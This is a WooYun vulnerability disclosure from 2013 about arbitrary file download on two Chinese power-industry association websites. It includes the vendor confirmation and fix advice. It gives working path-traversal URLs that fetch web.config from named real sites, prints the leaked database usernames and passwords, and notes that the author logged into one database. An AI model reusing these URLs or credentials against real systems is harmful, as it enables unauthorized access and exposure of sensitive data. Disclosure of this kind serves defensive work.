漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-025017
漏洞标题:中国电力两政府站点任意文件下载,其中一处可劫持后台数据库
相关厂商:中国电力两政府站点
漏洞作者: 小点兵
提交时间:2013-06-03 23:26
修复时间:2013-07-18 23:27
公开时间:2013-07-18 23:27
漏洞类型:任意文件遍历/下载
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-06-03: 细节已通知厂商并且等待厂商处理中
2013-06-07: 厂商已经确认,细节仅向厂商公开
2013-06-17: 细节向核心白帽子及相关领域专家公开
2013-06-27: 细节向普通白帽子公开
2013-07-07: 细节向实习白帽子公开
2013-07-18: 细节向公众公开
简要描述:
中国电力两政府站点任意文件下载,其中一处可成功劫持后台数据库,导致大量电力企业敏感信息暴露!
详细说明:
两处均可下载web.config:
第一处:中国电力建设企业协会 http://www.cepca.org.cn
第一处漏洞点:http://www.cepca.org.cn/download/download.aspx?filepath=/cns/../web.config&filename=web.config
第二处:中国电力工程质量监督总站 http://dlzj.cec.org.cn
第二处漏洞点:http://dlzj.cec.org.cn/DownLoad.aspx?filePath=/web.config&fileName=web.config
漏洞证明:
中国电力建设企业协会web.config:
数据库信息:server=localhost;uid=wensh;pwd=wensh22;database=Cepca2009_change;
没有站库分离
中国电力工程质量监督总站web.config:
数据库信息:data source=10.1.64.32;initial catalog=epqs;integrated security=false;persist security info=True;User ID=sa;Password=sa,./123456
有站库分离设计
nmap端口扫描:
中国电力建设企业协会 http://www.cepca.org.cn 1433端口开放
利用server=localhost;uid=wensh;pwd=wensh22;database=Cepca2009_change;登录数据库,好多表,找了一个敏感信息多的,截图如下,其他还有好多,未一一截图:
修复方案:
下载前过滤,白名单,比如只让下载xls,doc等
1433端口建议不要在公网上开放
版权声明:转载请注明来源 小点兵@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:18
确认时间:2013-06-07 22:46
厂商回复:
CNVD确认并复现所述情况,已经在4日转由CNCERT通过电力行业信息化主管部门(电监会信息中心),由其通报涉事单位处置。
按多个实例进行评分,rank=8+10=18
最新状态:
暂无